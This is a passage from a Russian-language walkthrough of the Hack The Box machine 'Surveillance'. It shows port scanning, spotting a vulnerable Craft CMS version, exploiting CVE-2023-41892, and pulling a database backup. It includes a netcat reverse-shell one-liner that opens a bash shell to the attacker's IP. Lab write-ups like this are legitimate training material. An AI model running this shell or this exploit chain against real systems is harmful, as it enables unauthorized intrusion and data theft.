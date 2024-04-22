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Наша цель — получение прав суперпользователя на машине Surveillance с учебной площадки Hack The Box. Уровень сложности — средний.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.245 surveillance.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел два открытых порта:
- 22 — служба OpenSSH 8.9p1;
- 80 — веб‑сервер Nginx 1.18.0.
На SSH без учетных данных делать нечего, поэтому сразу проходим к веб‑серверу, обратившись к адресу
surveillance. через браузер.
Точка входа
На странице находим пометку Powered by, из которой мы выясняем, что имеем дело с продуктом CMS Craft. При этом ссылка ведет к проекту на GitHub, благодаря чему узнаём и версию — 4.4.14.
Это далеко не последняя версия, а значит, с большой вероятностью в ней с момента релиза нашли уязвимости. Первым делом отправляемся искать готовые эксплоиты в Google.
Первая ссылка выводит на эксплоит для уязвимости CVE-2023-41892. Из‑за неправильной обработки данных можно передать и выполнить PHP-объект, то есть проэксплуатировать RCE.
Запускаем листенер
pwncat-cs и выполняем следующий реверс‑шелл. Это нужно для получения стабильной сессии на удаленном хосте.
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.121 4321 >/tmp/f
Продвижение
Пользователь Matthew
Так как на сервере работает целая CMS, первым делом поищем учетные данные, которые могут помочь в продвижении. В данном случае в каталоге CMS находим резервную копию базы данных.
Возможности pwncat позволяют скачать файл. Для этого комбинацией клавиш Ctrl-D переходим в основное меню pwncat, командой
download скачиваем файл, после чего командой
back возвращаемся обратно в терминал сессии.
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